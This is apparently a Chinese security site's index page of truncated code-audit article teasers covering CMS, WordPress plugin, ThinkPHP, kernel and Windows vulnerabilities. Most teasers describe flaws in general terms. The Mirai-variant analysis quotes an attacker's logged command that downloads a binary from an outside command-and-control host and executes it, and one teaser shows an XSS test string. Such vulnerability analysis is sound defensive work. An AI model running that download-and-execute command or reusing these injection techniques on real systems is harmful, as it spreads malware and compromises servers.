Buhtrap黑客组织最新0day漏洞分析 代码审计

Buhtrap黑客组织最新0day漏洞分析

一直以来Buhtrap组织以其针对俄罗斯的金融机构和企业而闻名。在我们的跟踪过程中,发现并分析了该组织的主要后门以及其他工具。 自2015年底以来,该组织变为以经济利益位目的的网络犯罪组织,其恶意软件出现于东欧和中亚进行间谍活动中。 2019年6月我们第一次发现Buhtrap使用0day攻击作。 同时我们发现Buhtrap在攻击过程中使用了本地提权漏洞CVE-2019-1132。 在Microsoft Windows中的本地权限提升漏洞利用的是win32k.sys组件中的NULL指针取消引用产生的问题。 该漏洞发现后就已经向Microsoft安全响应中心报告,该中心及时修...
最新
阅读全文
一次CMS源码审计与漏洞发现 代码审计

一次CMS源码审计与漏洞发现

0×01 环境搭建 选用了XAMPP 与 DM企业建站v20190522 进行代码审计。XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包,主界面如下: 0×02 代码审计 CMS通常会包含install文件,方便用户网站一键搭建。但是该文件也是经常出现漏洞的位置,本次审计的CMS漏洞也是出现在安装部分,具体细节如下: [+] 漏洞位置 :/install.php if($act=='doit'){ echo ' <div class="wrap"> '; $local = htmlenti...
阅读全文
记对OpenSNS的一次代码审计 代码审计

记对OpenSNS的一次代码审计

概述 OpenSNS是想天科技开发的一款综合性社交软件。您可以使用OpenSNS快速搭建一个类似于新浪微博一样的功能强大的社交网站。您的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用。除此之外,OpenSNS还提供云市场进行功能扩展,大量的扩展让你的网站如虎添翼。官网:http://www.opensns.cn/ 相关环境 源码信息:OpenSNS开源版 漏洞类型:后台getshell 下载地址:http://www.opensns.cn/home/index/download.html 漏洞文件:./Application/Admin...
阅读全文
关于CMSMS中SQL注入漏洞的复现与分析与利用 代码审计

关于CMSMS中SQL注入漏洞的复现与分析与利用

前言 CMS Made Simple(CMSMS)是一个简单且便捷的内容管理系统,它使用PHP、MySQL和Smarty模板引擎开发,具有基于角色的权限管理系统,基于向导的安装与更新机制,对系统资源占用少,同时包含文件管理、新闻发布以及RSS等模块。在CMS Made Simple <= 2.2.9的版本中存在一个基于时间的SQL盲注漏洞。通过将一个精心构造的语句赋值给新闻模块中的m1_idlist参数,可以利用该SQL盲注漏洞。 实验环境 1.渗透主机:Kali-Linux-2019.2-vm-i386 2.目标主机:CN_Windows7_x86_s...
阅读全文
dotCMS 5.1.5:利用H2 SQL注入实现RCE 代码审计

dotCMS 5.1.5:利用H2 SQL注入实现RCE

0x00 前言 在本文中,我们利用由RIPS代码分析系统发现的一个SQL注入漏洞(CVE-2019-12872),在基于java的内容管理系统dotCMS上实现了远程代码执行。 未授权攻击者可以通过CSRF或者以Publisher角色来利用这个SQL注入漏洞。攻击者可以执行堆叠SQL查询(stacked queries),这意味着当目标服务使用的是H2数据库时,攻击者有可能篡改任意数据库条目,甚至执行shell命令。   0x01 漏洞分析 dotCMS有个Push Publishing功能,该功能可以将内容从一个服务器远程发布到另一个服...
阅读全文
WordPress插件Form Maker SQL注入漏洞分析 代码审计

WordPress插件Form Maker SQL注入漏洞分析

最近WordPress的插件出现各种姿势漏洞(都是插件,不知何时能有核心漏洞出现),Easy WP SMTP、 Social Warfare、Form Maker等等,其中Form Maker1.13.3之前版本存在sql注入漏洞(CVE-2019-10866)。最近一直在看cms的漏洞代码,于是顺手在网上找了该插件的影响版本与修补后的版本进行了代码分析,并且在本地对该漏洞进行了分析复现和POC代码编写调试。下面是分析和复现的过程: 本地环境:Wordpress5.1 + Form Maker1.13.3 在本地搭建WordPress5.1版本,然后上网找一下FormM...
阅读全文
小众CMS vaeThink v1.0.1 代码执行漏洞挖掘分析 代码审计

小众CMS vaeThink v1.0.1 代码执行漏洞挖掘分析

0×01 引言 本文是对一个小众CMS(vaeThink v1.0.1)进行分析、代码执行漏洞挖掘和审计过程的记录,该CMS基于ThinkPHP5开发。作为一名代码审计的入门菜鸟,也希望能够将实践和学习的过程记录和分享,以期能够与大家共同交流进步。 0×02 分析 通过git将项目源码下载到本地,首先对项目源码目录结构进行了解: www  WEB部署目录(或者子目录) ├─app                   应用目...
阅读全文
CatFish CMS V4.8.75最新版XSS漏洞审计 代码审计

CatFish CMS V4.8.75最新版XSS漏洞审计

这里用到的是最新版的CatFish CMS V4.8.75,是一款开源免费的个人博客及企业建站系统。 首先在官网下载并安装 安装完成后我们先来看首页,有三个可以做输入的地方:搜索、评论、留言。本着见框就插的原则我们先来看搜索框,我们在搜索框注入测试代码:<script>alert(’1′)</script>再用burp suite改包提交: 我们将keyword的值修改为我们的测试代码后点击forward 可以看到测试代码并没有生效,应该是做了防护过滤,我们继续测试评论功能,这里有个限制,必须先登录再进行评论,我们注册一个...
阅读全文
PHPCMS v9.6.0 wap模块SQL注入 代码审计

PHPCMS v9.6.0 wap模块SQL注入

一、漏洞详情 phpcms v9.6.0 sys_auth 在解密参数后未进行适当校验造成 sql injection。 看下漏洞的关键点,漏洞最终触发 SQL 注入的点是位于 phpcms/modules/content/down.php 的 init 函数中: 在这个函数中,我们可以看到通过 GET 传参 a_k 参数的值,然后调用 sys_auth 方法并传参 DECODE 进行了和 auth_key 字段进行解密,其中 auth_key 是通过 load_config 读取 system 配置,对应的是位于 caches\configs\system...
阅读全文
通过Thinkphp框架漏洞所发现的安全问题 代码审计

通过Thinkphp框架漏洞所发现的安全问题

前言 在一次偶然的机会发现公司某个网站存在thinkphp的远程命令执行漏洞,自此对这个漏洞爱不释手。这究竟是为什么呢?主要原因有2点:第一,如果网站存在这个漏洞,我们可以去执行各种各样的系统命令来进行测试观察,尤其要是还有管理员权限就更舒服了;第二点,只要发现对应版本的thinkphp,漏洞利用步骤较为简单。(主要还是笔者太懒,hhh!!!)关于这个漏洞分析笔者就不在这里献丑了,主要是介绍下如何来去挖掘这个漏洞,以及笔者相关的一些思路。希望能给刚入安全圈的新人一点灵感。 0×01 漏洞简介 在2018年12月9日,thinkphp官方发布了一个重要的安全更新,修复了一个...
阅读全文
WordPress插件Easy WP SMTP反序列化漏洞分析 代码审计

WordPress插件Easy WP SMTP反序列化漏洞分析

WordPress 插件 Easy WP SMTP 最近新出了个漏洞,以前有分析过。不过新的代码好像变化有点大,所以这里花了点时间简单看看。 首先,这个漏洞存在于版本 v1.3.9。我这里能下到最接近的老版本是 v1.3.8,可惜 v1.3.9 更迭了一些重要代码,我找到的版本,应该不能复现这个漏洞。  下面我会根据网上一些细节进行分析,没耐心的大佬可以直接跳到最后,看原版的分析。 关键函数位置在: wp-content/plugins/easy-wp-smtp/easy-wp-smtp.php::admin_init 这里的函数,可以在用户登入 ...
阅读全文
探究PHP中的Mkdir函数 代码审计

探究PHP中的Mkdir函数

一、起因 在复现分析Wordpress-5.0.0 RCE 的时候,因为在写图片的过程中,根据图片的dirname创建目录,而后根据basename写入图片。在目录创建成功的前提下,应该是可以写入文件的。但是情况却不是如此,过程中我要在写目标图片前,必须还要再写一个辅助图片。其实这个辅助图片不是很重要,而重要的是这个辅助图片的目录创建。 此过程中例如需要写入目标文件为: 首先需要先写一张 为什么会这样?假设直接写目标文件,过程中会首先创建目录: 其实这个过程是没有创建任何目录的,因为判断是directory...
阅读全文
Metinfo 6.1.3 XSS漏洞分析 代码审计

Metinfo 6.1.3 XSS漏洞分析

前言 前段时间看到一个cms造成的xss漏洞,这里想分析下。这个漏洞是metinfo6.1.3版本因参数问题造成前台和后台引起了两处xss漏洞。 这个漏洞的影响范围一直到最新版本(6.1.3),因为前段时间爆出的漏洞,所以新版本应该已修复。 cms最新6.13下载地址:https://www.mituo.cn/download/   前台漏洞分析( CVE-2018-20486) 通过在前台插入xss访问,然后会在后台触发xss,造成xss攻击。 漏洞的触发点在admin/login/login_check.php 这里加载了$commonpa...
阅读全文
Linux内核CVE-2017-11176漏洞分析与复现 代码审计

Linux内核CVE-2017-11176漏洞分析与复现

一、漏洞背景 Linux内核中的POSIX 消息队列实现中存在一个UAF漏洞CVE-2017-11176。攻击者可以利用该漏洞导致拒绝服务或执行任意代码。本文将从漏洞成因、补丁分析以及漏洞复现等多个角度对该漏洞进行详细分析。 二、漏洞分析 Posix消息队列允许异步事件通知,当往一个空队列放置一个消息时,Posix消息队列允许产生一个信号或启动一个线程。这种异步事件通知调用mq_notify函数实现,mq_notify为指定队列建立或删除异步通知。由于mq_notify函数在进入retry流程时没有将sock指针设置为NULL,可能导致UAF漏洞。 ...
阅读全文
drupal8系列框架和漏洞动态调试深入分析 代码审计

drupal8系列框架和漏洞动态调试深入分析

前言 在drupal框架中,比较经典又离我们最近的莫过于18年的CVE-2018-7600这个漏洞了。但是通过本人阅读和学习过此漏洞分析文章的过程中,发现都是针对于此漏洞点的详细分析。相对于此框架运行流程不是很熟悉的人可能在阅读完后很难理解。 作为阿尔法实验室的一员,本人通过阅读框架相关文档与漏洞分析的相关文章和自己对框架源码的调试,对框架运行的流程有了进一步的了解。 在此把这些分享给大家,本文主要分为两大部分: 第一部分是对drupal框架流程的简介(这里主要针对8.x系列),让我们知道在symfony开源框架基础上的drupal框架是如何利用监听者...
阅读全文
类型混淆漏洞实例浅析 代码审计

类型混淆漏洞实例浅析

类型混淆漏洞一般是将数据类型A当做数据类型B来解析引用,这就可能导致非法访问数据从而执行任意代码。 本文通过IE类型混淆漏洞实例和Word类型混淆漏洞实例进行分析,来学习理解类型混淆漏洞原理。  实例一:IE/Edge类型混淆漏洞(CVE-2017-0037) 漏洞原因:函数处理时,没有对对象类型进行严格检查,导致类型混淆。 分析环境:Win7、IE11 分析工具:Windbg、od、IDA Pro 在PoC中定义了一个table,标签中定义了表id为th1,在boom()中引用,然后是setInterval设定事...
阅读全文
利用Thinkphp漏洞传播的Mirari新变种分析 代码审计

利用Thinkphp漏洞传播的Mirari新变种分析

一、概述 12月底,通过安全设备检测到几个不同的IP试图对几个公司内部的网站进行漏洞攻击。通过攻击日志发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码。 下图为攻击日志: 攻击者试图在被攻击服务器上执行如下命令: ‘Cd /tmp;wget http://cnc.junoland.xyz/bins/egg.x86;cat egg.x86> lzrd;chmod 777 lzrd;./lzrd ‘ 同时从该恶意文件存放网站上还发现了arm,...
阅读全文
thinkphp 5.x漏洞分析 代码审计

thinkphp 5.x漏洞分析

根据网上发布关于thinkphp 5.x远程代码执行漏洞预警,分析漏洞发生点,对比官方git更新版本,对照发现更新为request类,如下图所示: 观察发生更改的点为pathinfo()、method()、param()、post()、request()和cache()方法上,由此预测漏洞发生可能与这几个方法有关,进入5.0.10版本request.php中,如下图所示: 最后返回一个input方法,跟踪input方法,如下图所示:安全脉搏:https://www.secpulse.com/archives/95012.html ...
阅读全文
Windows 0day任意文件覆盖漏洞分析与验证 代码审计

Windows 0day任意文件覆盖漏洞分析与验证

漏洞名称 windows任意文件覆盖。 漏洞介绍 安全研究员SandboxEscaper披露Windows操作系统中第四个0-day漏洞的漏洞利用代码,利用该漏洞可以覆盖任意Windows10文件,包括通常无法访问的基本文件,例如SandboxEscaper在POC中给出的pci.sys文件,直接造成系统拒绝服务,当然可以用此方法来关闭第三方杀软,原文如下: 其漏洞发生模块为WER(Windows error report),WER是一个灵活的基于事件的反馈基础架构,用户收集硬件和软件发生问题时进行异常回收,然后发送给Microsoft,并给用户提示合适的异常...
阅读全文
漏洞预警 | ThinkPHP5远程命令执行漏洞 代码审计

漏洞预警 | ThinkPHP5远程命令执行漏洞

前言 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企 业应用开发而诞生的。由于其简单易用,国内用户众多。 2019年1月11日ThinkPHP团队发布了版本更新,本次更新包含了一个可能GetShell的安全更新,具体内容为改进Request类的method方法。 漏洞描述 Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格...
阅读全文